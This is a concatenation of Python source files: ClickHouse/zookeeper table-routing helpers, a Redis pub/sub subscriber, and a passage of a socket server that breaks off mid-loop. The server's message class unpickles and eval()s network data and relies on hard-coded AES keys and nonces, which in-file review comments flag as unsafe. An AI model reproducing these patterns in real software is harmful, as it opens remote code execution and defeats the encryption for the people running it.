            sql = SHOW_SCHEMA_SQL.format(db_name, distributed_table)
            schema = get_table_schema(inner_client, sql)
            schemas[program][DISTRIBUTED_TABLE] = schema
            distributed_schemas.add(schema)
            sql = SHOW_SCHEMA_SQL.format(db_name, replicated_table)
            schema = get_table_schema(inner_client, sql)
            schemas[program][REPLICATED_TABLE] = schema
            replicated_schemas.add(schema)
        finally:
            inner_client.disconnect()
    # BUG FIX: the original XOR-of-hashes check (`hash_code == 0`) only cancels
    # out when the node count is even; on an odd-sized cluster a perfectly
    # consistent table was reported inconsistent (and hash collisions could
    # also mask real differences). Compare distinct schema sets instead: each
    # table must show exactly one schema across all nodes.
    consistency = len(distributed_schemas) <= 1 and len(replicated_schemas) <= 1
    return {CONSISTENCY: consistency, SCHEMAS: schemas}
def check_schema(rt_info):
    """Compare the RT's fields with the physical ck table fields.

    :param rt_info: rt config info
    :return: schema diff between rt fields and storage fields
    """
    client, db_name, _, replicated_table, _ = common_initial(rt_info)
    try:
        result = {RT_FIELDS: {}, CLICKHOUSE_FIELDS: {}, CHECK_RESULT: True, CHECK_DIFF: {}}
        for field in rt_info[FIELDS]:
            if field[FIELD_NAME].lower() in ClICKHOUSE_EXCEPT_FIELDS:
                continue
            result[RT_FIELDS][field[FIELD_NAME].lower()] = field[FIELD_TYPE].lower()
        # physical table fields
        sql = QUERY_FIELDS_SQL.format(db_name, replicated_table)
        for cell in client.execute(sql):
            field_name, file_type = cell[0], cell[1]
            if field_name.lower() in ClICKHOUSE_EXCEPT_FIELDS:
                continue
            result[CLICKHOUSE_FIELDS][field_name.lower()] = file_type
        append_fields, delete_fields, bad_fields = check_rt_clickhouse_fields(
            result[RT_FIELDS], result[CLICKHOUSE_FIELDS]
        )
        result[CHECK_DIFF] = {APPEND_FIELDS: append_fields, DELETE_FIELDS: delete_fields, BAD_FIELDS: bad_fields}
        if bad_fields:
            result[CHECK_RESULT] = False
            logger.warning(f"{rt_info[RESULT_TABLE_ID]} diff between rt fields and ck fields: {result}")
        return result
    except Exception as e:
        # BUG FIX: the message previously said "failed to create table",
        # copied from create_table(); this function only checks the schema.
        logger.error(f"{rt_info[RESULT_TABLE_ID]}: failed to check schema", exc_info=True)
        raise e
    finally:
        client.disconnect()
def check_rt_clickhouse_fields(rt_table_columns, clickhouse_columns):
    """Diff the rt fields against the physical ClickHouse table fields.

    :param rt_table_columns: rt fields translated into clickhouse column form
    :param clickhouse_columns: physical clickhouse table columns
    :return: (append_fields, delete_fields, bad_fields) — columns to add,
        columns to drop, and columns whose types mismatch
        (the original docstring listed only two of the three members)
    """
    append_fields, bad_fields, delete_fields = [], {}, []
    for key, value in rt_table_columns.items():
        col_name, col_type = key.lower(), value.lower()
        if col_name in clickhouse_columns:
            # present on both sides: types must agree after mapping
            if RT_TYPE_TO_CLICKHOUSE_MAPPING[col_type] != clickhouse_columns[col_name]:
                bad_fields[col_name] = "difference between rt and clickhouse({} != {})".format(
                    col_type, clickhouse_columns[col_name]
                )
        else:
            append_fields.append(f"{col_name} {RT_TYPE_TO_CLICKHOUSE_MAPPING[col_type]}")
    # columns only in clickhouse are dropped, except the internal partition column
    delete_fields = list(set(clickhouse_columns.keys()).difference(set(rt_table_columns.keys())))
    if PARTITION_TIME in delete_fields:
        delete_fields.remove(PARTITION_TIME)
    return append_fields, delete_fields, bad_fields
def clusters():
    """Return the list of ClickHouse storage clusters."""
    return model_manager.get_storage_cluster_configs_by_type(CLICKHOUSE)
@contextlib.contextmanager
def open_zk(hosts):
    """Context manager yielding a started KazooClient; always stops it on exit.

    :param hosts: zookeeper host string
    """
    command_retry = kazoo.retry.KazooRetry()
    connection_retry = kazoo.retry.KazooRetry()
    zk = kazoo.client.KazooClient(hosts=hosts, connection_retry=connection_retry, command_retry=command_retry)
    zk.start()
    try:
        yield zk
    finally:
        zk.stop()
def sync_zk_table_whitelist(rt_info):
    """Publish the cluster host list for this result table to zookeeper.

    :param rt_info: result table info
    :raises ClickHouseConfigException: when no cluster hosts are found
    """
    client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
    try:
        ck = rt_info[STORAGES][CLICKHOUSE]
        conn = json.loads(ck[STORAGE_CLUSTER][CONNECTION_INFO])
        result_set = client.execute(QUERY_CLUSTER_SQL)
        hosts = [result[0] for result in result_set]
    finally:
        # BUG FIX: the client was never disconnected, leaking a connection on
        # every sync (every prepare() call).
        client.disconnect()
    if not hosts:
        logger.error(f"{rt_info[RESULT_TABLE_ID]}: not found host list, {QUERY_CLUSTER_SQL}")
        raise ClickHouseConfigException(message_kv={MESSAGE: "not found host list"})
    path = CK_TB_ZK_PATH_FORMAT % (ck[STORAGE_CLUSTER][CLUSTER_NAME], rt_info[RESULT_TABLE_ID])
    with open_zk(conn[ZK_ADDRESS]) as zk:
        set_zk_data(zk, path, json.dumps(hosts))
def set_zk_data(zk_client, path, data):
    """Write data to a zookeeper node, creating the path when needed.

    :param zk_client: zk connection
    :param path: node path
    :param data: data to write
    """
    logger.info(f"{zk_client.hosts}: going to set {data} for {path}")
    # ensure the node exists, create it otherwise
    zk_client.ensure_path(path)
    # NOTE(review): ensure_path() above already creates the node, so the
    # ephemeral create() branch below appears unreachable — confirm intent.
    if zk_client.exists(path):
        zk_client.set(path, data)
    else:
        zk_client.create(path, data, ephemeral=True)
def read_zk_data(zk_client, path):
    """Read the content of a zookeeper node.

    :param zk_client: zk client
    :param path: node path
    :return: raw node data
    :raises ClickHouseConfigException: when the path is missing or empty
    """
    if not zk_client.exists(path, watch=None):
        raise ClickHouseConfigException(message_kv={MESSAGE: f"{path}: not found path of ck config"})
    data, stat = zk_client.get(path, watch=None)
    if not data:
        raise ClickHouseConfigException(message_kv={MESSAGE: f"{path}: has no ck config"})
    logger.info(f"{zk_client.hosts}: content is {data}, {path}")
    return data
def read_node_data(zk_client, path):
    """Read and validate node weight info from zookeeper.

    :param zk_client: zk client
    :param path: node path
    :return: parsed node dict, or {} when reading/validation fails (failures
        are logged and reported via wechat, not raised)
    """
    result = dict()
    try:
        data = read_zk_data(zk_client, path)
        data_dict = json.loads(data)
        # alert when the data was last updated more than 2 hours ago
        threshold = int(time.time()) * 1000 - 2 * 60 * 60 * 1000
        if threshold > data_dict[TIMESTAMP]:
            raise ClickHouseConfigException(
                message_kv={MESSAGE: f"{path}: last mtime {data_dict[TIMESTAMP]} < threshold time {threshold}"}
            )
        result = data_dict
    except Exception:
        msg = f"{path}: failed to query path weight config, {traceback.format_exc(1000)}"
        logger.error(msg)
        util.wechat_msg(RTX_RECEIVER, msg)
    return result
def read_tb_data(zk_client, path):
    """Read the table host whitelist from a zookeeper node.

    :param zk_client: zk client
    :param path: node path
    :return: parsed list
    :raises Exception: re-raised after logging and wechat alerting
    """
    data_list = list()
    try:
        data = read_zk_data(zk_client, path)
        data_list = json.loads(data)
    except Exception as e:
        msg = f"{path}: failed to query path table config, {traceback.format_exc(1000)}"
        logger.error(msg)
        util.wechat_msg(RTX_RECEIVER, msg)
        raise e
    return data_list
def weights(rt_info):
    """Compute per-host routing weights for a result table.

    Weight = free_disk * factor for every enabled whitelisted node above the
    fusing threshold, then normalized to integer percentages.

    :param rt_info: rt config info
    :return: {WEIGHTS: {"host:http_port": pct}, TIMESTAMP: ...}; WEIGHTS is
        empty on failure (errors are logged and reported, not raised)
    """
    result = {WEIGHTS: {}}
    try:
        ck = rt_info[STORAGES][CLICKHOUSE]
        conn = json.loads(ck[STORAGE_CLUSTER][CONNECTION_INFO])
        client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
        # fetch the node list
        try:
            result_set = client.execute(QUERY_CLUSTER_SQL)
        finally:
            # BUG FIX: the client was never disconnected, leaking a
            # connection on every weights() call.
            client.disconnect()
        hosts = {rs[0]: int(rs[1]) for rs in result_set}
        # read zk weight info for each node and compute the weight ratio
        if not hosts:
            msg = f"{rt_info[RESULT_TABLE_ID]}: not found host list, {QUERY_CLUSTER_SQL}"
            logger.error(msg)
            util.wechat_msg(RTX_RECEIVER, msg)
            raise ClickHouseConfigException(message_kv={MESSAGE: msg})
        with open_zk(conn[ZK_ADDRESS]) as zk:
            # table host whitelist
            table_white_list = read_tb_data(
                zk, CK_TB_ZK_PATH_FORMAT % (ck[STORAGE_CLUSTER][CLUSTER_NAME], rt_info[RESULT_TABLE_ID])
            )
            # hosts that actually carry the local table
            table_host_list = [
                host
                for host, port in hosts.items()
                if table_exists(host, port, db_name, distributed_table, replicated_table)
            ]
            # usable hosts must both carry the table and be whitelisted
            sum_weight = 0
            avi_table_hosts = [t_h for t_h in table_host_list if (t_h in hosts.keys() and t_h in table_white_list)]
            for host in avi_table_hosts:
                data = read_node_data(zk, CK_NODE_ZK_PATH_FORMAT % (ck[STORAGE_CLUSTER][CLUSTER_NAME], host))
                if not data:
                    logger.warning(f"{host}: failed to query node data")
                    continue
                weight = data[FREE_DISK] * data[FACTOR]
                if data[ENABLE] and weight > FUSING_THRESHOLD:
                    result[TIMESTAMP] = data[TIMESTAMP]
                    result[WEIGHTS][f"{host}:{conn[HTTP_PORT]}"] = weight
                    sum_weight += weight
                else:
                    # node unusable: disabled, or free capacity below the
                    # fusing threshold; capacity alerting covers this case
                    logger.error(
                        "{}: disk free {} lte fusing threshold {} or not enable".format(
                            host, data[FREE_DISK], FUSING_THRESHOLD
                        )
                    )
            # normalize to percentages
            for host, weight in result[WEIGHTS].items():
                result[WEIGHTS][host] = int(weight * 100 / sum_weight)
    except Exception:
        msg = f"{rt_info[RESULT_TABLE_ID]}: failed to query weights, {traceback.format_exc(1000)}"
        logger.error(msg)
        util.wechat_msg(RTX_RECEIVER, msg)
    return result
def route_config(rt_info):
    """Collect the current zookeeper routing state for a result table.

    :param rt_info: result-table configuration dict.
    :return: ``{NODES: [{host: node_data}, ...], TABLE: whitelist}`` where
        NODES holds one entry per cluster host and TABLE is the per-table
        host whitelist stored in zookeeper.
    :raises ClickHouseConfigException: when the cluster reports no hosts.
    """
    ck = rt_info[STORAGES][CLICKHOUSE]
    conn = json.loads(ck[STORAGE_CLUSTER][CONNECTION_INFO])
    client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
    # ask the cluster for its host list
    hosts = [row[0] for row in client.execute(QUERY_CLUSTER_SQL)]
    if not hosts:
        msg = f"{rt_info[RESULT_TABLE_ID]}: not found host list, {QUERY_CLUSTER_SQL}"
        logger.error(msg)
        raise ClickHouseConfigException(message_kv={MESSAGE: msg})
    cluster_name = ck[STORAGE_CLUSTER][CLUSTER_NAME]
    result = {NODES: [], TABLE: []}
    with open_zk(conn[ZK_ADDRESS]) as zk:
        result[NODES] = [
            {host: read_node_data(zk, CK_NODE_ZK_PATH_FORMAT % (cluster_name, host))}
            for host in hosts
        ]
        result[TABLE] = read_tb_data(
            zk, CK_TB_ZK_PATH_FORMAT % (cluster_name, rt_info[RESULT_TABLE_ID])
        )
    return result
def set_route_config(rt_info, params):
    """Write routing configuration to zookeeper.

    Two modes, selected by ``params[TYPE]``:
      * NODES: patch the record of the single node ``params[IP]`` — any of the
        FACTOR / ENABLE / FREE_DISK keys present in ``params`` are applied —
        and refresh its TIMESTAMP (epoch milliseconds).
      * anything else: overwrite the table whitelist with the comma-separated
        host list in ``params[HOSTS]``.

    :param rt_info: result-table configuration dict.
    :param params: request parameters (TYPE, IP or HOSTS, optional node fields).
    """
    ck = rt_info[STORAGES][CLICKHOUSE]
    conn = json.loads(ck[STORAGE_CLUSTER][CONNECTION_INFO])
    with open_zk(conn[ZK_ADDRESS]) as zk:
        if params[TYPE] == NODES:
            path = CK_NODE_ZK_PATH_FORMAT % (ck[STORAGE_CLUSTER][CLUSTER_NAME], params[IP])
            # NOTE(review): read_node_data may return a falsy value when the node
            # record is missing, in which case the item assignment below fails.
            data = read_node_data(zk, path)
            for k in [FACTOR, ENABLE, FREE_DISK]:
                if k in params:
                    data[k] = params[k]
            # bug fix: was `int(time.time()) * 1000`, which truncated to whole
            # seconds before scaling; keep true millisecond precision instead.
            data[TIMESTAMP] = int(time.time() * 1000)
            set_zk_data(zk, path, json.dumps(data))
        else:
            path = CK_TB_ZK_PATH_FORMAT % (ck[STORAGE_CLUSTER][CLUSTER_NAME], rt_info[RESULT_TABLE_ID])
            hosts = params[HOSTS].split(",")
            set_zk_data(zk, path, json.dumps(hosts))
|
subscriber.py | # -*- coding: utf-8 -*-
#
# The MIT License (MIT)
#
# Copyright (c) 2017 Ivo Tzvetkov
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
from redis import StrictRedis
from threading import Thread, Event
try:
from queue import Queue, Empty
except ImportError:
from Queue import Queue, Empty
from .exc import *
__all__ = ['Subscriber']
LOOP_TIMEOUT = 0.01
class ThreadEvents(object):
    """Signalling bundle shared between a worker thread and its owner.

    The owner sets ``terminate`` to request shutdown; the worker sets
    ``terminated`` once it has fully stopped, after recording any exception
    it died on in ``exception``.
    """

    def __init__(self):
        self.terminate, self.terminated = Event(), Event()
        # Filled in by the worker thread if it exits with an error.
        self.exception = None
class Subscriber(object):
    """Redis-backed subscriber for 'redmsg' channels.

    Wraps a redis-py PubSub connection and adds ``listen_from``, which replays
    transactions persisted under ``redmsg:<channel>:<txid>`` keys starting at a
    given txid before switching to live pubsub messages, detecting gaps unless
    ``ignore_missing`` is set.
    """

    def __init__(self, redis=None, **redis_config):
        # Use the provided client, or build one from the remaining kwargs.
        self.redis = redis if redis is not None else StrictRedis(**redis_config)
        self.pubsub = self.redis.pubsub(ignore_subscribe_messages=True)
        self.channel = None  # name of the single channel we are subscribed to

    def subscribe(self, channel):
        """Subscribe to *channel*; only one channel at a time is supported."""
        if self.channel is not None:
            raise ChannelError('already subscribed to a channel')
        self.pubsub.subscribe('redmsg:' + channel)
        self.channel = channel

    def unsubscribe(self, channel):
        """Drop the current subscription."""
        if self.channel is None:
            raise ChannelError('not subscribed to a channel')
        self.pubsub.unsubscribe('redmsg:' + channel)
        self.channel = None

    def process_message(self, message):
        """Decode a raw pubsub message into ``{channel, txid, data}``.

        The payload is ``"<txid>:<data>"``; the channel name drops the 7-char
        ``'redmsg:'`` prefix.
        """
        txid, data = message['data'].decode('utf-8').split(':', 1)
        return {
            'channel': message['channel'].decode('utf-8')[7:],
            'txid': int(txid),
            'data': data
        }

    def listen(self):
        """Yield live messages forever (no replay, no gap detection)."""
        if self.channel is None:
            raise ChannelError('not subscribed to a channel')
        for message in self.pubsub.listen():
            yield self.process_message(message)

    def _listener_thread(self, queue, events):
        """Worker: poll pubsub and push decoded messages onto *queue*."""
        try:
            while not events.terminate.is_set():
                message = self.pubsub.get_message(timeout=LOOP_TIMEOUT)
                if message is not None:
                    queue.put(self.process_message(message))
        except Exception as e:
            events.exception = e
        finally:
            events.terminated.set()

    def _loader_thread(self, queue, events, txid, batch_size, ignore_missing=False):
        """Worker: replay stored txids starting at *txid*, then go live.

        The live listener is started FIRST so nothing published during the
        replay is lost; ``latest`` tracks the highest txid already delivered
        and is used to drop live messages the replay already covered.
        """
        try:
            listener_queue = Queue()
            listener_events = ThreadEvents()
            listener_thread = Thread(target=self._listener_thread, args=(listener_queue, listener_events))
            listener_thread.daemon = True
            listener_thread.start()
            latest = -1
            current = txid
            loaded = batch_size  # primes the loop condition below
            # keep fetching while full batches arrive (or, with ignore_missing,
            # while anything at all arrived in the previous batch)
            while (loaded == batch_size or (ignore_missing and loaded > 0)) and not events.terminate.is_set():
                loaded = 0
                keys = ['redmsg:{0}:{1}'.format(self.channel, current + i) for i in range(batch_size)]
                for idx, data in enumerate(self.redis.mget(keys)):
                    if data is None:
                        # missing/expired txid: skip or stop depending on mode
                        if ignore_missing:
                            continue
                        else:
                            break
                    else:
                        latest = current + idx
                        queue.put({
                            'channel': self.channel,
                            'txid': latest,
                            'data': data.decode('utf-8')
                        })
                        loaded += 1
                current += batch_size
        # nothing stored at the requested txid in strict mode: hard error
            if not ignore_missing and latest == -1 and not events.terminate.is_set():
                raise MissingTransaction('txid not found: {0}'.format(txid))
            # live phase: forward listener messages newer than the replay point
            while not events.terminate.is_set() and not listener_events.terminated.is_set():
                try:
                    message = listener_queue.get(timeout=LOOP_TIMEOUT)
                    if message['txid'] > latest:
                        if not ignore_missing:
                            if message['txid'] != (latest + 1):
                                raise MissingTransaction('missing txid: {0}'.format(latest + 1))
                            else:
                                latest = message['txid']
                        # NOTE(review): with ignore_missing=True `latest` never
                        # advances in this loop, so live messages above the replay
                        # point are all forwarded without dedup — confirm intended.
                        queue.put(message)
                except Empty:
                    pass
        except Exception as e:
            events.exception = e
        finally:
            # stop the listener and propagate any exception it recorded
            if listener_thread.is_alive():
                listener_events.terminate.set()
                listener_events.terminated.wait()
            if listener_events.exception:
                events.exception = listener_events.exception
            events.terminated.set()

    def listen_from(self, txid, batch_size=100, ignore_missing=False):
        """Generator: yield stored messages starting at *txid*, then live ones.

        :param txid: first transaction id to deliver (coerced to int).
        :param batch_size: how many stored keys to mget() per round trip.
        :param ignore_missing: when False, raise MissingTransaction on gaps.
        :raises ChannelError: when not subscribed.
        :raises MissingTransaction: re-raised from the loader thread on exit.
        """
        if self.channel is None:
            raise ChannelError('not subscribed to a channel')
        txid = int(txid)
        loader_queue = Queue()
        loader_events = ThreadEvents()
        loader_thread = Thread(target=self._loader_thread, args=(loader_queue, loader_events, txid, batch_size, ignore_missing))
        loader_thread.daemon = True
        loader_thread.start()
        try:
            while not loader_events.terminated.is_set():
                try:
                    yield loader_queue.get(timeout=LOOP_TIMEOUT)
                except Empty:
                    pass
        finally:
            # runs when the consumer stops iterating, too: wind down the loader
            if loader_thread.is_alive():
                loader_events.terminate.set()
                loader_events.terminated.wait()
            if loader_events.exception:
                raise loader_events.exception
|
server.py | from re import S
import select
import socket
import queue
import threading
import sys
import pickle
import base64
import os
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.primitives.serialization import load_ssh_public_key
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding
from cryptography.hazmat.backends import default_backend
import hashlib
import yaml
import random
import time
class IPNC():
    """Small YAML-file key/value helpers plus a random-name generator."""

    def __init__(self):
        pass

    def _read_yml(self, file=None):
        """Load and return the full contents of the YAML file."""
        with open(file) as handle:
            return yaml.full_load(handle)

    def _write_yml(self, file=None, dict_data=None, mode="a+"):
        """Dump `dict_data` into `file` (appends by default)."""
        with open(file, mode) as handle:
            yaml.dump(dict_data, handle)

    def _add_node(self, file=None, node=None):
        """Insert or update the (key, value) pair `node` in `file`.

        A missing file content or absent key falls through to the append
        path via KeyError (deliberate exception-as-control-flow).
        """
        try:
            current = self._read_yml(file)
            if current is not None:
                current[node[0]]  # KeyError here selects the append path
                self._change_node_value(file, node)
            else:
                raise KeyError
        except KeyError:
            self._write_yml(file, {node[0]: node[1]})

    def _change_node_value(self, file=None, node=None):
        """Overwrite the value stored under `node[0]` and rewrite the file."""
        contents = self._read_yml(file)
        contents[node[0]] = node[1]
        self._write_yml(file=file, dict_data=contents, mode="w")

    def _get_node(self, file=None, key=None, wait=True):
        """Return the value under `key`, or the whole document when key is None.

        With wait=True this busy-polls until the key appears; with wait=False
        a missing key yields None.
        """
        if key is None:
            return self._read_yml(file)
        if wait:
            while True:
                contents = self._read_yml(file)
                try:
                    return contents[key]
                except (KeyError, TypeError):
                    pass
        contents = self._read_yml(file)
        try:
            return contents[key]
        except (KeyError, TypeError):
            return None

    def _remove_node(self, file, node):
        """Delete `node` from the file; returns False when it was absent."""
        try:
            contents = self._read_yml(file=file)
            contents[node]
            contents.pop(node)
            self._write_yml(file=file, dict_data=contents, mode="w")
        except KeyError:
            return False
        except:
            # best-effort: swallow I/O/parse errors (original behavior)
            pass

    def _name_generator(self, _len_=16, onlyText=False):
        """Return `_len_` distinct random characters (letters only if onlyText)."""
        lowers = list("abcdefghijklmnopqrstuvwxyz")
        uppers = list('ABCDEFGHIJKLMNOPQRSTUVWXYZ')
        specials = list("!@#$%&*?")
        digits = list("0123456789")
        pool = lowers + uppers if onlyText else lowers + uppers + specials + digits
        random.shuffle(pool)
        # sample() draws without replacement, so all characters are distinct
        return "".join(random.sample(pool, _len_))
class DSP():
    """Wire-format envelope exchanged between server and clients.

    A DSP carries a message string and a type tag; ``_messanger`` serializes
    and AES-GCM-encrypts it, ``_convert_to_class`` reverses the process.

    SECURITY NOTE (review): this protocol pickles/unpickles and ``eval``s data
    received from the network, and falls back to an AES key, nonce and AAD
    hard-coded in the source. None of this is safe against a hostile peer; it
    is kept as-is because existing clients depend on the exact format.
    """

    def __init__(
        self,
        msg: str = None,
        DSP_type: str = None,
        device_id: int = None,
        universalAesKey: bytes = None,
        nonce: bytes = None,
        aad: str = None,
    ):
        """Store the payload and crypto material, falling back to built-ins.

        :param msg: message payload to wrap.
        :param DSP_type: type tag describing the payload (e.g. "DSP_MSG").
        :param device_id: identifier of the sender; shipped next to the
            ciphertext so the receiver can pick the right key.
        :param universalAesKey: AES-GCM key; defaults to the shared
            pre-handshake key when omitted.
        :param nonce: AES-GCM nonce; defaults to the built-in nonce.
        :param aad: additional authenticated data for AES-GCM.
        """
        # bug fix: the original `if msg is not None: ... else: ...` assigned the
        # same value on both branches; collapsed to one assignment.
        self.msg = msg
        self.DSP_type = DSP_type
        self.device_id = device_id
        # SECURITY: hard-coded fallbacks — every deployment using the defaults
        # shares the same pre-handshake secrets, and the fixed nonce means
        # nonce reuse across messages encrypted with the universal key.
        self.UNIVERSAL_AES_KEY = (
            universalAesKey
            if universalAesKey is not None
            else b't\x89\xcc\x87\xcca\xe8\xfb\x06\xed\xcf+\x0eVB\xd2\xd3\xbeMk\xfa\xd1J\xa7\xc8@\xf8\x05\x0f\xfc\x18\x00'
        )
        self.NONCE = nonce if nonce is not None else b'\xfe\x1e1\xc0\xfc`s\xbc6\x9fQ\xb2'
        self.AAD = aad if aad is not None else b"au$tica&tedbut@u32nencr#cdscypteddatafdrj"

    def _messanger(self, MSG=None):
        """Serialize and encrypt this DSP; returns base64 bytes ready to send.

        The payload is the pickled constructor-call string, AES-GCM-encrypted
        and wrapped as ``[device_id, ciphertext]`` (pickled, base64-encoded).
        """
        if MSG is not None:
            self.msg = MSG
        pickled_data = pickle.dumps(f'DSP("{self.msg}","{self.DSP_type}")')
        encrypted_data = [self.device_id, self.__encrypt(pickled_data)]
        return base64.b64encode(pickle.dumps(encrypted_data))

    def __repr__(self):
        return "_main.DSP._"

    def __encrypt(self, data):
        """AES-GCM-encrypt `data` with this instance's key/nonce/AAD."""
        aesgcm = AESGCM(self.UNIVERSAL_AES_KEY)
        return aesgcm.encrypt(self.NONCE, data, self.AAD)

    def _convert_to_class(self, OBJECT: bytes = None, secure: bool = True, secure_dict: list = None):
        """Decrypt a received envelope and rebuild it as a DSP instance.

        :param OBJECT: base64-encoded, pickled ``[device_id, ciphertext]`` pair.
        :param secure: when True, decrypt with the per-client key pack given in
            `secure_dict`; otherwise use the built-in universal key.
        :param secure_dict: base64-encoded pickled dict holding "aes_key",
            "nonce" and "aad" (required when `secure` is True).
        :raises SystemExit: on TypeError while decoding (original behavior,
            including the missing-`secure_dict` case).

        SECURITY: ``pickle.loads`` and ``eval`` on network data allow arbitrary
        code execution by anyone able to produce a valid ciphertext.
        """
        try:
            OBJECT = pickle.loads(base64.b64decode(OBJECT))
            if secure:
                if secure_dict is None:
                    raise TypeError(
                        "convert_to_class() missing 1 required positional argument: 'secure_lst'")
                key_pack = pickle.loads(base64.b64decode(secure_dict))
                aesgcm = AESGCM(key_pack["aes_key"])
                plaintext = aesgcm.decrypt(
                    key_pack["nonce"], OBJECT[-1], key_pack["aad"])
            else:
                aesgcm = AESGCM(self.UNIVERSAL_AES_KEY)
                plaintext = aesgcm.decrypt(self.NONCE, OBJECT[-1], self.AAD)
            return eval(pickle.loads(plaintext))
        except TypeError:
            sys.exit()
        except ValueError:
            print("sender has not done the handshake")
class MAIN(IPNC):
    """select()-based multi-client TCP server with per-client AES-GCM session keys.

    A select loop (`__server`) frames raw bytes off the sockets; three daemon
    threads cooperate over shared lists that are mutated in place with no
    locking (NOTE(review): relies on CPython list-op atomicity — confirm):
      * ``receive_func`` decrypts/dispatches inbound frames,
      * ``send_func`` encrypts and writes queued outbound payloads,
      * ``__callback_loop`` runs callbacks registered via ``LISTEN()``.
    """

    def __init__(self, secure: bool = True, file=None):
        """Initialize shared state and reload previously persisted client keys.

        :param secure: stored but not read elsewhere in this class (kept for
            API compatibility).
        :param file: YAML file used to persist client key packs.
        """
        IPNC.__init__(self)
        self.__secure = secure
        self.__file_location = file
        # select() bookkeeping
        self.READABLE = []
        self.WRITABLE = []
        self.INPUTS = []
        self.OUTPUTS = []
        self.MESSAGE_QUEUES = {}  # socket -> Queue of usernames (routing keys)
        # outbound routing queues; each item is [target_username, payload]
        self.REQUEST_LIST = []
        self.REQUEST_RESPONSE_LIST = []
        self.MESSAGE_LIST = []
        self.__VARIFIED_DEVICES = []  # usernames that completed the handshake
        self.__CLIENT_KEYS = {}  # username -> base64(pickled AES key pack)
        self.__CUSTOM_CHANNEL = []
        self.__CUSTOM_CHANNEL_MSG_REC = []
        self.__CUSTOM_CHANNEL_MSG_SEND = []
        self.__VARIFIER_LIST = []  # pending handshake responses
        self.__CALLBACK_LOOP = []  # [callable, args] pairs queued by LISTEN()
        self.__RECEIVING_MSG = []  # raw inbound frames awaiting decryption
        # restore client keys persisted under the sha256("key") node, if any
        get = self._get_node(file=self.__file_location, key=hashlib.sha256(bytes("key", "utf-8")).digest(), wait=False)
        if get is not None:
            self.__CLIENT_KEYS = get
            self.__VARIFIED_DEVICES.extend(list(get.keys()))

    def SERVER(self, address: str = None, port: int = None, listeners: int = None):
        """Bind the listening socket and start the select loop plus worker threads.

        All threads are daemons, so the caller's process must stay alive.

        :param address: interface to bind.
        :param port: TCP port to bind.
        :param listeners: backlog passed to ``socket.listen``.
        """
        self.address = address
        self.port = port
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.setblocking(0)  # non-blocking: required by the select loop
        self.sock.bind((self.address, self.port))
        self.sock.listen(listeners)
        print("[SERVER IS ACTIVATED | LISTENING]")
        self.INPUTS.append(self.sock)
        # inbound decrypt/dispatch worker
        thread1 = threading.Thread(
            target=self.receive_func,
            args=(
                self.__RECEIVING_MSG,
                self.__VARIFIED_DEVICES,
                self.__VARIFIER_LIST,
                self.__CLIENT_KEYS,
                self.OUTPUTS,
                self.REQUEST_LIST,
                self.REQUEST_RESPONSE_LIST,
                self.MESSAGE_LIST,
                self.__CUSTOM_CHANNEL_MSG_REC,
            )
        )
        # outbound encrypt/write worker
        thread2 = threading.Thread(
            target=self.send_func,
            args=(
                self.WRITABLE,
                self.MESSAGE_QUEUES,
                self.MESSAGE_LIST,
                self.REQUEST_LIST,
                self.REQUEST_RESPONSE_LIST,
                self.__VARIFIER_LIST,
                self.__CUSTOM_CHANNEL_MSG_SEND
            )
        )
        # LISTEN() callback dispatcher
        thread3 = threading.Thread(
            target=self.__callback_loop,
            args=(
                self.__CALLBACK_LOOP,
            )
        )
        thread1.daemon = True
        thread1.start()
        thread2.daemon = True
        thread2.start()
        thread3.daemon = True
        thread3.start()
        thread = threading.Thread(target=self.__server)
        thread.daemon = True
        thread.start()

    def __server(self):
        """Select loop: accept connections, frame inbound data, track writables.

        Framing: a 32-byte "0"-padded header announcing the payload length,
        then the payload itself.  NOTE(review): outbound headers written by
        send_func are 16 bytes padded with "|" — presumably the client mirrors
        this asymmetry; confirm against the client implementation.
        """
        # pending [socket, expected_payload_length] pairs
        data_recv_len = []
        while True:
            readable, writable, exceptions = select.select(self.INPUTS, self.OUTPUTS, self.INPUTS)
            # handling the inputs
            for r in readable:
                if r is self.sock:
                    # new client connection
                    connection, addr = r.accept()
                    connection.setblocking(0)
                    self.INPUTS.append(connection)
                    self.MESSAGE_QUEUES[connection] = queue.Queue()
                else:
                    ini = list(zip(*data_recv_len))
                    if len(ini) == 0 or r not in ini[0]:
                        # header phase: read the length prefix
                        try:
                            data_len = pickle.loads(base64.b64decode(r.recv(32).decode().strip("0").encode("utf-8")))
                        except ConnectionResetError:
                            print("Client Disconnected")
                            if r in self.OUTPUTS:
                                self.OUTPUTS.remove(r)
                            if r in self.WRITABLE:
                                self.WRITABLE.remove(r)
                            self.INPUTS.remove(r)
                            r.close()
                            del self.MESSAGE_QUEUES[r]
                            continue
                        except Exception as e:
                            # NOTE(review): on decode failure data_len keeps its
                            # previous loop value (or is unbound on first pass)
                            pass
                        if data_len:
                            if type(data_len) == type([]):
                                data_recv_len.append(
                                    [
                                        r,
                                        data_len[0]
                                    ]
                                )
                            else:
                                # non-list header => treat as disconnect
                                print("User Disconnected")
                                if r in self.OUTPUTS:
                                    self.OUTPUTS.remove(r)
